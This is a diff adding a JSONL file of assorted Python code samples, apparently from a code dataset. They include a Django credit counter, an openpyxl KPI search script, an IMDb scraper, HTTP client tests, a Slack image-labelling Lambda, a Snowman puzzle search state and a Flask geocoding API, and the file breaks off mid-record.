diff --git "a/4997.jsonl" "b/4997.jsonl" new file mode 100644--- /dev/null +++ "b/4997.jsonl" @@ -0,0 +1,733 @@ +{"seq_id":"331668728","text":"from django import forms\nfrom .models import Choice\n\nclass ChoiceForm(forms.Form):\n\n class Meta:\n model = Choice()\n\n def __init__(self, question, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n for choice in question.choice_set.all():\n field = forms.IntegerField(min_value=0, max_value=9, label=choice.choice_text, initial=\"0\")\n self.fields[\"resistance_value_%s\" % choice.id ] = field\n","sub_path":"polls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"648450093","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport re\nfrom counter.models import Student\nfrom django.http import Http404\nimport hashlib\n\n\n# Create your views here.\ndef index(request):\n \"\"\"インデクスページの表示\"\"\"\n return render(request, 'counter/index.html', {})\n\n\ndef result(request):\n \"\"\"結果の表示\"\"\"\n 基礎教養 = 0.0\n 総合教養 = 0.0\n 高度教養 = 0.0\n 外国語1 = 0.0\n 外国語2 = 0.0\n 健康スポーツ = 0.0\n 情報基礎 = 0.0\n 丸1 = 0.0\n 丸2 = 0.0\n 丸3 = 0.0\n 丸 = 0.0\n flag = 0\n units = 0.0\n gp = 0.0\n gpa = 0.0\n special_units = 0.0\n special_gp = 0.0\n special_gpa = 0.0\n\n name_maru1 = [\"力学基礎1\", \"微分積分1\", \"線形代数1\", \"プログラミング演習1\", \"初年次セミナー\", \"力学基礎2\", \"微分積分2\", \"線形代数2\", \"プログラミング演習2\", \"離散数学\", \"応用解析学\", \"微分積分3\", \"線形代数3\", \"電磁気学基礎1\", \"プログラミング演習3\", \"微分積分4\", \"線形代数4\", \"電磁気学基礎2\", \"プログラミング演習4\", \"物理学実験\", \"常微分方程式論\", \"応用アルゴリズム演習\", \"複素関数論\", \"数値解析\", \"総合演習A1\", \"総合実験A1\", \"総合実験A2\", \"総合演習A2\", \"総合実験B1\", \"総合演習B1\", \"総合実験B2\", \"総合演習B2\"]\n name_maru2 = [\"電気回路及び演習1\", \"電気回路及び演習2\", \"アルゴリズム・データ構造\", \"データ解析1\", \"アルゴリズム・データ構造演習\", \"データ解析2\", \"制御工学及び演習1\", \"数理計画及び演習1\", \"信号解析1\", \"データ解析演習\", \"制御工学及び演習2\", \"数理計画及び演習2\", \"信号解析2\", \"信号解析演習\"]\n name_maru3 = [\"情報・通信ネットワーク\", \"論理回路\", \"計算機概論\", \"波動と振動\", \"システムモデル\", \"確率と統計\", \"コンピュータシステム1\",\"現象計算\", \"ソフトウェア工学\", \"言語工学\", \"コンピュータシステム2\", \"ロボティクス\", \"設計工学\", \"電子回路\", \"並列計算\", \"卒業研究\"]\n name_maru = [\"情報数学\", \"オペレーションズリサーチ\", \"現代制御\", \"情報管理\", \"知識工学\", \"マクロ系計算\", \"ミクロ系計算\", \"ソフトウェア開発1\", \"ソフトウェア開発2\", \"センシングとメカトロニクス\", \"メディア情報処理\", \"光情報工学\", \"ディジタル信号処理\", \"HPC\"]\n\n text = request.POST.get('grade_book')\n try:\n lines_before = text.splitlines()\n except:\n raise Http404\n\n\n if(lines_before[0].split()[-1] != \"単位修得状況照会\"):\n raise Http404\n\n for line in lines_before:\n lines_after = line.split()\n\n if(len(lines_after) < 4):\n continue\n\n if(lines_after[-2] == \"学籍番号\"):\n student_id = lines_after[-1]\n\n if(lines_after[0] == \"No.\"):\n flag = 1\n continue\n if(flag == 1):\n if(lines_after[1] == \"全学共通授業科目\"):\n if(lines_after[2] == \"基礎教養科目\"):\n 基礎教養 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if(lines_after[2] == \"総合教養科目\"):\n 総合教養 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if(lines_after[2] == \"外国語科目\"):\n if(re.match(r\"U1CA\", lines_after[3]) and (lines_after[4] != \"Autonomous\")):\n 外国語1 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n elif(lines_after[4] == \"Autonomous\"):\n 外国語1 += float(lines_after[-6])\n\n else:\n 外国語2 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if(lines_after[2] == \"情報科目\"):\n 情報基礎 += float(lines_after[-6])\n\n if(lines_after[2] == \"健康・スポーツ科学\"):\n 健康スポーツ += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if (lines_after[1] == \"高度教養科目\"):\n 高度教養 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if (lines_after[1] == \"専門科目\"):\n if(lines_after[-7] in name_maru1):\n 丸1 += float(lines_after[-6])\n if((lines_after[-2] != \"─\") and (not re.match(r\"U1\", lines_after[3]))):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n if(lines_after[-7] in name_maru2):\n 丸2 += float(lines_after[-6])\n if(lines_after[-2] != \"─\"):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n if(lines_after[-7] in name_maru3):\n 丸3 += float(lines_after[-6])\n if (lines_after[-2] != \"─\"):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n if(lines_after[-7] in name_maru):\n 丸 += float(lines_after[-6])\n if (lines_after[-2] != \"─\"):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n try:\n special_gpa = round(special_gp / special_units, 2)\n except:\n special_gpa = 0\n\n special_gp = round(special_gp, 2)\n entrance_year = int(\"20\"+student_id[0:2])\n #student_id_hashed = 適当にハッシュ化している。\n\n #DB更新\n try:\n student=Student.objects.create(student_id=student_id_hashed, special_units=special_units, special_gp=special_gp, special_gpa=special_gpa, entrance_year=entrance_year)\n #print(\"初使用\")\n except:\n #print(\"2回目以降\")\n student = Student.objects.get(student_id=student_id_hashed)\n student.delete()\n student=Student.objects.create(student_id=student_id_hashed, special_units=special_units, special_gp=special_gp, special_gpa=special_gpa, entrance_year=entrance_year)\n\n q = Student.objects.filter(special_gp__gt=special_gp, entrance_year__iexact=entrance_year)\n #ranking = Student.objects.raw('SELECT count(*) FROM counter_student WHERE special_gp > (SELECT special_gp FROM counter_student WHERE counter_student.student_id = %s)', student_id_hashed)\n all = Student.objects.filter(entrance_year__iexact=entrance_year)\n rank = len(q) + 1\n num = len(all)\n params = {\n '基礎教養': 6.0-基礎教養,\n '総合教養': 6.0-総合教養,\n '高度教養進級単位': 2.0-高度教養,\n '高度教養卒業単位': 4.0-高度教養,\n '外国語1': 6.0-外国語1,\n '外国語2': 4.0-外国語2,\n '健康スポーツ': 1.0-健康スポーツ,\n '情報基礎': 1.0-情報基礎,\n '丸1': 33.5-丸1,\n '丸2進級単位': 11.5-丸2,\n '丸3進級単位': 26-丸3,\n '丸2と丸3進級単位': 39.5-(丸2 + 丸3),\n '丸2卒業単位': 13.5-丸2,\n '丸3卒業単位': 38-丸3,\n '丸進級単位': 5-丸,\n '丸卒業単位': 11-丸,\n '専門GP': special_gp,\n '専門単位数': special_units,\n '専門GPA': special_gpa,\n '基礎教養進級': 基礎教養 > 5,\n '総合教養進級': 総合教養 > 5,\n '高度教養進級': 高度教養 > 1,\n '高度教養卒業': 高度教養 > 3,\n '外国語1進級': 外国語1 > 5,\n '外国語2進級': 外国語2 > 3,\n '健康スポーツ進級': 健康スポーツ > 0,\n '情報基礎進級': 情報基礎 > 0,\n '丸1進級': 丸1 >= 33.5,\n '丸2進級': 丸2 >= 11.5,\n '丸3進級': 丸3 >= 26,\n '丸2と丸3進級': (丸2 + 丸3) >= 39.5,\n '丸進級': 丸 >= 5,\n '丸2卒業': 丸2 >= 13.5,\n '丸3卒業': 丸3 >= 38,\n '丸卒業': 丸 >= 11,\n 'GPランク': rank,\n '人数': num,\n '入学年度': entrance_year\n }\n\n return render(request, 'counter/result.html', params)\n\n\ndef how(request):\n \"\"\"使用方法の表示\"\"\"\n return render(request, 'counter/how.html', {})\n","sub_path":"counter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25394567","text":"import openpyxl\n# import os\n# print(os.getcwd())\nimport time\nstart_time = time.time()\n\nfile_name = ['MTS_Summary_Financials_IFRS_final_v2.xlsm', 'MFON_Q4_2016.xlsx']\nworkbook = openpyxl.load_workbook(file_name[0])\nsheetsList = workbook.sheetnames\n# print(sheetsList)\n# sheet = workbook[sheetsList[1]]\n# print(sheet)\n\nsearch_word = 'revenue'\n\ndef KPI_position_search(KPI):\n # column = 0\n # while True:\n for column in range(1, 100):\n # column += 1\n for row in range(1, 200):\n # print(row, str(sheet.cell(row = row, column = column).value))\n if KPI.lower() in str(sheet.cell(row = row, column = column).value).lower():\n return row\n# print('KPI position row:{}'.format(KPI_position_search(search_word)))\n\n\ndef time_position_search():\n row = 0\n while True:\n row += 1\n for column in range(1, 100):\n # print(column, str(sheet.cell(row=row, column=column).value))\n if 'q1'.lower() in str(sheet.cell(row = row, column = column).value).lower():\n return (row, column)\n# print('Time position row:{} and column:{}'.format(time_position_search()[0],time_position_search()[1]))\n\n\ndef time_renaming():\n time_list = list()\n row_quarter = time_position_search()[0]\n column = time_position_search()[1]\n\n # if '20' in str(sheet.cell(row = row_quarter, column = column).value):\n # value_list.append(str(sheet.cell(row = row_quarter, column = column).value))\n # else:\n for row_year in range(1, row_quarter): # check where year is located\n if '20' in str(sheet.cell(row = row_year, column = column).value):\n while True:\n if sheet.cell(row = row_quarter, column = column).value == None:\n break\n else:\n time_list.append(str(sheet.cell(row = row_quarter, column = column).value) +\n str(sheet.cell(row = row_year, column = column).value))\n column += 1\n # print(time_list)\n\n year_index = [] # year_index shows location of values with year (e.g. 2015) in time_list\n for index in range(len(time_list)):\n if '20' in time_list[index]:\n # print(index)\n year_index.append(index)\n # print(year_index)\n diff = year_index[-1] - year_index[-2]\n\n time_list_cleaned = []\n for index in range(len(time_list)):\n # print(time_list[index])\n if '20' in time_list[index]:\n # print(index)\n for num in range(diff):\n # print([index + num], time_list[index + num])\n time_list_cleaned.append(time_list[index + num]\n .replace('None', time_list[index][-4:])\n .replace('*',''))\n return time_list_cleaned\n\n\ndef get_financials(KPI):\n try:\n if KPI_position_search(KPI) == None:\n quit()\n\n value_dictionary = dict()\n column = time_position_search()[1]\n while True:\n if sheet.cell(row = KPI_position_search(KPI), column = column).value == None:\n # if KPI_position_search(KPI) == None:\n # print(KPI_position_search(KPI))\n break\n if '20' in str(sheet.cell(row = time_position_search()[0], column = column).value):\n value_dictionary[str(sheet.cell(row = time_position_search()[0], column = column).value)] = str(sheet.cell(row = KPI_position_search(KPI), column = column).value)\n # print(value_dictionary[str(sheet.cell(row = time_position_search()[0], column = column).value)])\n column += 1\n else:\n for i in time_renaming():\n value_dictionary[i] = str(sheet.cell(row = KPI_position_search(KPI), column = column).value)\n column += 1\n return value_dictionary\n except:\n print('There is no \"{}\" on this sheet {}'.format(search_word, sheet))\n\n # return '{:,} mlnRUB'.format(sheet.cell(row = row_search(KPI), column = column_search()).value)\n# get_financials('service revenue')\n# print(get_financials(search_word))\n\nfor i in range(len(workbook.sheetnames)):\n sheet = workbook[sheetsList[i]]\n print(str(sheet).center(50, '='))\n print('KPI position row: {}'.format(KPI_position_search(search_word)))\n print(str(sheet), get_financials(search_word))\n\n\n\ndef run_time(start_time):\n end_time = time.time()\n scriptRunDuration = (end_time - start_time)/60 # in minutes # measure the execution time of a Python script\n timeString = str(scriptRunDuration).split('.')\n minutes = timeString[0]\n seconds = int(timeString[1]) * 60\n print('Took {} min and {} sec'.format(minutes, str(seconds)[:2]))\nrun_time(start_time)","sub_path":"mts_v3.py","file_name":"mts_v3.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"213346045","text":"import requests\nimport threading\nfrom bs4 import BeautifulSoup\n\ndef descarga(codigo):\n URL = \"http://www.imdb.com/title/\"+codigo\n try:\n ans = requests.get(URL)\n pag = ans.content\n archivo_html = codigo+\".html\"\n with open (archivo_html,\"wb\") as archivo:\n archivo.write(pag)\n print(\"Archivo %s escrito\" % archivo_html)\n except OSError as e:\n print(archivo_html)\n print(e.strerror)\n\ndef lee(lista):\n for peli in lista:\n archivo = peli+\".html\"\n with open(archivo, \"r\") as archivo:\n html = archivo.read()\n soup = BeautifulSoup(html,\"html.parser\")\n titulo = soup.title.string\n descript = soup.findAll(\"div\",class_=\"inline canwrap\")\n print(titulo)\n print(descript[0].text)\n\n\ndef main():\n lista = [\"tt0068163\",\"tt0068164\",\"tt0068165\",\"tt0068166\",\"tt0068167\",\n \"tt0068168\",\"tt0068169\",\"tt0068170\",\"tt0068171\",\"tt0068172\",\n \"tt0068173\",\"tt0068174\",\"tt0068175\",\"tt0068176\",\"tt0068177\"]\n\n for page in lista:\n t1 = threading.Thread(target=descarga, args=(page,))\n t1.start()\n #pelis[]=page\n #Done\n #print(\"AcabÈ\")\n lee(lista)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Trabajos Python/obtiene procesa busqueda/Descarga_paginas_html.py","file_name":"Descarga_paginas_html.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211483572","text":"import pytest\nfrom httplib import HTTPException\nfrom geventhttpclient.httplib import HTTPConnection\nimport gevent.server\nfrom contextlib import contextmanager\n\nlistener = ('127.0.0.1', 54322)\n\n@contextmanager\ndef server(handler):\n server = gevent.server.StreamServer(\n listener,\n handle=handler)\n server.start()\n try:\n yield\n finally:\n server.stop()\n\ndef wrong_response_status_line(sock, addr):\n sock.recv(4096)\n sock.sendall('HTTP/1.1 apfais df0 asdf\\r\\n\\r\\n')\n\ndef test_httplib_exception():\n with server(wrong_response_status_line):\n connection = HTTPConnection(*listener)\n connection.request(\"GET\", '/')\n with pytest.raises(HTTPException):\n connection.getresponse()\n\ndef success_response(sock, addr):\n sock.recv(4096)\n sock.sendall(\"HTTP/1.1 200 Ok\\r\\n\"\n \"Content-Type: text/plain\\r\\n\"\n \"Content-Length: 12\\r\\n\\r\\n\"\n \"Hello World!\")\n\ndef test_success_response():\n with server(success_response):\n connection = HTTPConnection(*listener)\n connection.request(\"GET\", \"/\")\n response = connection.getresponse()\n assert response.should_keep_alive()\n assert response.message_complete\n assert not response.should_close()\n assert response.read() == 'Hello World!'\n assert response.content_length == 12\n\n","sub_path":"src/geventhttpclient/tests/test_httplib.py","file_name":"test_httplib.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20315228","text":"import os\nimport urllib\nimport boto3\n\n\n#input\nVERIFICATION_TOKEN = os.environ['VERIFICATION_TOKEN'] \nACCESS_TOKEN = os.environ['ACCESS_TOKEN'] \n\n\nSUPPORTED_TYPES = ['image/jpg', 'image/png', 'image/jpeg'] \nMAX_SIZE = 5242880 \nrekognition = boto3.client('rekognition')\n\n\ndef check_token(event):\n #Checks incoming token with existing token\n if event['token'] != VERIFICATION_TOKEN:\n print('Invalid token')\n return False\n return True\n\n\ndef confirm_event(event):\n #Validates image attributes and size\n\n event_details = event['event']\n file_subtype = event_details.get('subtype')\n file_details = event_details['file']\n mime_type = file_details['mimetype']\n file_size = file_details['size']\n\n if file_subtype != 'file_share':\n print('Not a file_shared event')\n return False\n if mime_type not in SUPPORTED_TYPES:\n print('File is not an image')\n return False\n if file_size > MAX_SIZE:\n print('Image is larger than 5MB')\n return False\n\n return True\n\n\ndef download_image(url):\n # Download image from private Slack URL using bearer token authorization.\n request = urllib.request.Request(url, headers={'Authorization': 'Bearer %s' % ACCESS_TOKEN})\n return urllib.request.urlopen(request).read()\n\n\ndef detect_attribute(image_bytes):\n # Checks image for label using Amazon Rekoginition\n try:\n response = rekognition.detect_labels(Image={'Bytes': image_bytes,},MinConfidence=80.0)\n except Exception as e:\n raise(e)\n labels = response['Labels']\n if any(label['Name'] == 'Animal' for label in labels):\n return True\n return False\n\n\ndef post_message(channel, message):\n #Posts message to Slack channel via Slack API.\n url = 'https://slack.com/api/chat.postMessage'\n data = urllib.parse.urlencode(((\"token\", ACCESS_TOKEN),(\"channel\", channel),(\"text\", message)))\n data = data.encode(\"ascii\")\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n request = urllib.request.Request(url, data, headers)\n urllib.request.urlopen(request)\n\n\ndef lambda_handler(event, context):\n if not check_token(event): \n return\n\n if event.get('challenge') is not None: \n challenge = event['challenge']\n return {'challenge': challenge}\n\n if not confirm_event(event): \n return\n #extract data \n event_details = event['event']\n file_details = event_details['file']\n channel = event_details['channel']\n url = file_details['url_private']\n file_id = file_details['id']\n\n image_bytes = download_image(url)\n is_animal = detect_attribute(image_bytes)\n message = \"\"\n if is_animal:\n print('Attribute detected')\n message = 'Wow!! Thats an Animal!!!'\n else:\n print('Attribute not detected')\n message = 'No. This is not an Animal.'\n post_message(channel, message)","sub_path":"lambda-method/wildlife_finder.py","file_name":"wildlife_finder.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547944968","text":"\"\"\"Snowball routines.\n\n A) Class SnowmanState\n\n A specializion of the StateSpace Class that is tailored to the game of Snowball.\n\n B) class Direction\n\n An encoding of the directions of movement that are possible for robots in Snowball.\n\n Code also contains a list of 40 Snowball problems for the purpose of testing.\n\"\"\"\n\nfrom search import *\n\nclass SnowmanState(StateSpace):\n \n # a StateSpace with additional key attributes\n\n def __init__(self, action, gval, parent, width, height, robot, snowballs, obstacles, destination):\n \n #width: the width of the Snowman Puzzle board\n #height: the height of the Snowman Puzzle board\n #robot: position for the robot: a tuple (x, y), that denotes the robot's x and y position.\n \n #snowballs: positions for each snowball (or stack of snowballs) as keys of a dictionary. Each position is an (x, y) tuple. The value of each key is the index for that snowball's size (see below). Some values denote stacks of snowballs at a given location as well.\n \n #obstacles: locations of all of the obstacles (i.e. walls) on the board. Obstacles, like robots and snowballs, are also tuples of (x, y) coordinates.\n \n #destination: the target destination for the snowperson: a tuple (x, y), that denotes the desired position for the completed snowperson.\n \n #sizes: contains the key, value pairs that indicate snowball sizes or the presence of a snowball stack. The possible values are: ’b’ for a big snowball, ’m’ for a medium snowball, and ’s’ for a small one. A ’G’ denotes a completed snowperson. In addition, note that there are values to indicate stacks of snowballs on the board: ’A’ represents a medium snowball atop big one, ’B’ represents a small snowball atop big one and ’C’ represents a small snowball atop medium one. See Figure 2 for snowballs as they are represented by the ASCII visualizer you have been provided.\n \n \n\n\n StateSpace.__init__(self, action, gval, parent)\n self.width = width\n self.height = height\n self.robot = robot\n self.destination = destination \n self.snowballs = snowballs\n self.obstacles = obstacles\n \n #snowball sizes: 'b' is 'big', 'm' is 'medium' and 's' is small. \n #A type 'G' snowman is a complete snowman.\n #A type 'A' snowman is formed by placing a medium snowball atop big one.\n #A type 'B' snowman is formed by placing a small snowball atop medium one.\n #A type 'C' snowman is formed by placing a small snowball atop big one.\n self.snowball_sizes = {0: 'b', 1: 'm', 2: 's', 3: 'A', 4: 'B', 5: 'C', 6: 'G'} \n\n\n def successors(self):\n \n #This function generates a list of SnowmanStates that are successors to a given SnowmanState. Each state will be annotated by the action that was used to arrive at the SnowmanState up, down, left, right.\n \n successors = []\n transition_cost = 1\n\n for direction in (UP, RIGHT, DOWN, LEFT):\n\n new_location = direction.move(self.robot)\n \n #if the new location is outside of bounds, skip\n if new_location[0] < 0 or new_location[0] >= self.width:\n continue\n if new_location[1] < 0 or new_location[1] >= self.height:\n continue\n if new_location in self.obstacles:\n continue\n \n new_snowballs = dict(self.snowballs)\n index = 0\n\n if new_location in self.snowballs: #if the location we're going to is where there's a snowball\n new_snowball_location = direction.move(new_location) #move the snowball\n \n #snowball out of bounds?\n if new_snowball_location[0] < 0 or new_snowball_location[0] >= self.width:\n continue\n if new_snowball_location[1] < 0 or new_snowball_location[1] >= self.height:\n continue\n if new_snowball_location in self.obstacles:\n continue \n if self.snowball_sizes[new_snowballs[new_location]] == 'G': #can't move a complete Snowman \n continue \n\n #cases where bigger snowball is pushed atop smaller one(s) \n if new_snowball_location in new_snowballs: #if the new snowball location is where there's a snowball\n if self.snowball_sizes[new_snowballs[new_snowball_location]] == 'b' and self.snowball_sizes[new_snowballs[new_location]] == 'm':\n index = 3 #will transition to A formation of snowballs\n elif self.snowball_sizes[new_snowballs[new_snowball_location]] == 'm' and self.snowball_sizes[new_snowballs[new_location]] == 's':\n index = 4 #will transition to B formation of snowballs\n elif self.snowball_sizes[new_snowballs[new_snowball_location]] == 'b' and self.snowball_sizes[new_snowballs[new_location]] == 's':\n index = 5 #will transition to C formation of snowballs \n elif self.snowball_sizes[new_snowballs[new_snowball_location]] == 'A' and self.snowball_sizes[new_snowballs[new_location]] == 's':\n index = 6 #will transition to Goal formation of snowballs \n else:\n continue\n\n #cases where a stack of snowballs is pushed apart \n if self.snowball_sizes[new_snowballs[new_location]] == 'A':\n new_snowballs[new_location] = 0 #b\n new_snowballs[new_snowball_location] = 1 #m \n index = 7; \n if self.snowball_sizes[new_snowballs[new_location]] == 'B':\n new_snowballs[new_location] = 1 #m\n new_snowballs[new_snowball_location] = 2 #s \n index = 7; \n if self.snowball_sizes[new_snowballs[new_location]] == 'C':\n new_snowballs[new_location] = 0 #b\n new_snowballs[new_snowball_location] = 2 #s \n index = 7; \n\n if index == 0: #case robot has pushed one snowball\n index = new_snowballs.pop(new_location)\n elif index != 7: #case robot has pushed snowballs stack apart \n new_snowballs.pop(new_location)\n new_snowballs.pop(new_snowball_location)\n \n if index < 7: #case robot has pushed two snowballs together\n new_snowballs[new_snowball_location] = index\n \n if index == 7: #if robot pushed snowball stack apart, no movement of robot results\n new_robot = self.robot\n else:\n new_robot = tuple(new_location)\n\n new_state = SnowmanState(action=direction.name, gval=self.gval + transition_cost, parent=self,\n width=self.width, height=self.height, robot=new_robot,\n snowballs=new_snowballs, obstacles=self.obstacles, destination=self.destination)\n successors.append(new_state)\n\n return successors\n\n def hashable_state(self):\n \n #This is a function that calculates a unique index to represents a particular SnowmanState. It is used to facilitate path and cycle checking.\n\n\n return hash((self.robot, frozenset(self.snowballs.items())))\n\n\n def state_string(self):\n \"\"\"\n Return a string representation of a state that can be printed to stdout.\n\n \"\"\"\n map = []\n for y in range(0, self.height):\n row = []\n for x in range(0, self.width):\n row += [' ']\n map += [row]\n\n if self.robot in self.obstacles:\n print(\"error: robot is in list of obstacles\")\n\n if self.destination in self.obstacles:\n print(\"error: destination for snowman is in list of obstacles\")\n\n for obstacle in self.obstacles:\n map[obstacle[1]][obstacle[0]] = '#'\n\n map[self.destination[1]][self.destination[0]] = 'X'\n\n for snowball in self.snowballs:\n map[snowball[1]][snowball[0]] = self.snowball_sizes[self.snowballs[snowball]]\n if snowball in self.obstacles:\n print(\"error: snowball is in list of obstacles\")\n\n map[self.robot[1]][self.robot[0]] = '?'\n\n for y in range(0, self.height):\n map[y] = ['#'] + map[y]\n map[y] = map[y] + ['#']\n map = ['#' * (self.width + 2)] + map\n map = map + ['#' * (self.width + 2)] \n\n s = ''\n for row in map:\n for char in row:\n s += char\n s += '\\n'\n\n return s \n\n\n def print_state(self):\n #This function prints a SnowmanState to stdout (ASCII art FTW).\n print(\"ACTION was \" + self.action) \n print(self.state_string())\n\n\ndef removekey(d, key): \n r = dict(d)\n del r[key]\n return r\n\ndef snowman_goal_state(state):\n \"\"\"\n Returns True if we have reached a goal state.\n\n @param state: a Snowball state\n OUTPUT: True (if goal) or False (if not)\n \"\"\"\n for snowball in state.snowballs:\n if(state.snowball_sizes[state.snowballs[snowball]] == 'G' and snowball[1] == state.destination[1] and snowball[0] == state.destination[0]): #means a complete snowman is on the board and in the right spot\n return True\n return False \n\ndef generate_coordinate_rect(x_start, x_finish, y_start, y_finish):\n \"\"\"\n Generate tuples for coordinates in rectangle (x_start, x_finish) -> (y_start, y_finish)\n \"\"\"\n coords = []\n for i in range(x_start, x_finish):\n for j in range(y_start, y_finish):\n coords.append((i, j))\n return coords\n\n\"\"\"\nSnowball Directions: encodes directions of movement that are possible for each robot.\n\"\"\"\nclass Direction():\n \"\"\"\n A direction of movement.\n \"\"\"\n \n def __init__(self, name, delta):\n \"\"\"\n Creates a new direction.\n @param name: The direction's name.\n @param delta: The coordinate modification needed for moving in the specified direction.\n \"\"\"\n self.name = name\n self.delta = delta\n \n def __hash__(self):\n \"\"\"\n The hash method must be implemented for actions to be inserted into sets \n and dictionaries.\n @return: The hash value of the action.\n \"\"\"\n return hash(self.name)\n \n def __str__(self):\n \"\"\"\n @return: The string representation of this object when *str* is called.\n \"\"\"\n return str(self.name)\n \n def __repr__(self):\n return self.__str__()\n \n def move(self, location):\n \"\"\"\n @return: Moving from the given location in this direction will result in the returned location.\n \"\"\"\n return (location[0] + self.delta[0], location[1] + self.delta[1])\n\n\n#Global Directions\nUP = Direction(\"up\", (0, -1))\nRIGHT = Direction(\"right\", (1, 0))\nDOWN = Direction(\"down\", (0, 1))\nLEFT = Direction(\"left\", (-1, 0))\n\n\n\n \n","sub_path":"CSC384/Assignment1/snowman.py","file_name":"snowman.py","file_ext":"py","file_size_in_byte":11324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382214644","text":"from __future__ import absolute_import\n\nimport json\nimport os\nfrom urlparse import urlparse\n\nfrom flask import Flask, render_template, request, redirect, session,jsonify, make_response\nfrom flask_sslify import SSLify\nfrom rauth import OAuth2Service\nimport requests\nimport urllib, urllib2\n\nfrom model import db\nfrom model import User\nfrom model import CreateDB\nfrom model import app as application\nfrom sqlalchemy.exc import IntegrityError,SQLAlchemyError\nimport os\n\napp = Flask(__name__)\napp.requests_session = requests.Session()\napp.secret_key = os.urandom(24)\n\nsslify = SSLify(app)\n\n#Location API's\n@app.route('/locations', methods=['GET'])\ndef show_addresses():\n all_addresses = g.db.execute('select id, nickname, location, latitude, longitude from addresses').fetchall()\n entries = [dict(id=address[0], nickname=address[1], location=address[2], latitude=address[3], longitude=address[4]) for address in all_addresses]\n return json.dumps(entries)\n\t\n@app.route('/locations', methods=['POST'])\ndef create_address():\n try:\n name = request.json['name']\n address = request.json['address']\n city = request.json['city']\n state = request.json['state']\n zip = request.json['zip']\n params = {\n 'address' : address+city+state,\n 'sensor' : 'false',\n } \n\n url = 'http://maps.google.com/maps/api/geocode/json?' + urllib.urlencode(params)\n response = urllib2.urlopen(url)\n result = json.load(response)\n \n place = result['results'][0]['geometry']['location']\n\n database = CreateDB(hostname='127.0.0.1')\n db.create_all()\n user = User(name,address,city,state,zip,place['lat'],place['lng'])\n db.session.add(user)\n db.session.commit()\n\n response = jsonify({'id':user.id,'name':request.json['name'], 'address':request.json['address'],'city':request.json['city'],'state':request.json['state'],'zip':request.json['zip'],\n 'coordinates':place})\n response.status_code = 201\n return response\n except IntegrityError as e:\n db.session.rollback()\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 403\n return resp\n except SQLAlchemyError as e:\n db.session.rollback()\n resp = jsonify({\"error\": str(e)})\n resp.status_code = 403\n return resp\n\n@app.route('/locations/')\ndef show_address(address_id):\n try:\n user = User.query.filter_by(id=address_id).first_or_404()\n return jsonify({'id':user.id, 'name':user.name, 'address':user.address,'city':user.city,'state':user.state,'zip':user.zip,'coordinates':{'lat':user.lat,'lng':user.lng}})\n except IntegrityError:\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 404\n return resp\n\n@app.route('/locations/', methods=['PUT'])\ndef edit_address(address_id):\n\ttry:\n\t\tuser = User.query.get(address_id)\n\t\tdata = json.loads(request.data)\n\t\tuser.name = data['name']\n\t\tdb.session.commit()\n\t\tresp = jsonify({\"result\":True})\n\t\tresp.status_code = 202\n\t\treturn resp\n\n\texcept IntegrityError as e:\n db.session.rollback()\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 403\n return resp\n\n@app.route('/locations/', methods=['DELETE'])\ndef delete_address(address_id):\n try:\n db.session.delete(User.query.get(address_id))\n db.session.commit()\n resp = jsonify({\"result\":True})\n resp.status_code = 204\n return resp\n\n except IntegrityError as e:\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 404\n return resp\n\n\nif __name__ == '__main__':\n app.debug = os.environ.get('FLASK_DEBUG', True)\n app.run(port=7000)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321197795","text":"from sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport torch\r\nimport argparse\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--starting_rank\", required=True,help=\"starting rank for the classifier\", type=int)\r\nparser.add_argument(\"--ending_rank\", required=True,help=\"ending rank for the classifier, make sure it's not more than 1000+starting rank\", type=int)\r\nparser.add_argument(\"--model_name\", default=\"model\", help=\"model name where model will be saved, assumed this is consistent for language pairs\")\r\nparser.add_argument(\"--previous_scores\", default=\"wmt20-sent.en-ha.laser-score\", help=\"file where scores of the previous iteration are saved\")\r\nparser.add_argument(\"--current_scores\", default=\"scores.txt\", help=\"file where scores of the current iteration are saved\")\r\nparser.add_argument(\"--src_embedding\", 